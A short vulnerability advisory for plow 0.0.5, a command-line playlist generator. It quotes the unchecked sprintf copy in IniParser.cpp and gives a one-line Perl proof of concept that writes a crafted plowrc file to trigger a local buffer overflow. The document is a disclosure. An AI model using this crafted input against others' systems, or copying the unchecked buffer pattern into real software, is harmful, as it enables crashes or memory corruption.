################################################# plow 0.0.5 <= Buffer Overflow Vulnerability ################################################# Discovered by: Jean Pascal Pereira <pereira@secbiz.de> Vendor information: "plow is a command line playlist generator." Vendor URI: http://developer.berlios.de/projects/plow/ ################################################# Risk-level: Medium The application is prone to a local buffer overflow vulnerability. ------------------------------------- IniParser.cpp, line 26: 26: char buffer[length]; 27: char group [length]; 28: 29: char *option; 30: char *value; 31: 32: while(ini.getline(buffer, length)) { 33: if(!strlen(buffer) || buffer[0] == '#') { 34: continue; 35: } 36: if(buffer[0] == '[') { 37: if(buffer[strlen(buffer) - 1] == ']') { 38: sprintf(group, "%s", buffer); 39: } else { 40: err = 1; 41: break; 42: } 43: } ------------------------------------- Exploit / Proof Of Concept: Create a crafted plowrc file: perl -e '$x="A"x1096;print("[".$x."]\nA=B")'>plowrc ------------------------------------- Solution: Do some input validation. ------------------------------------- #################################################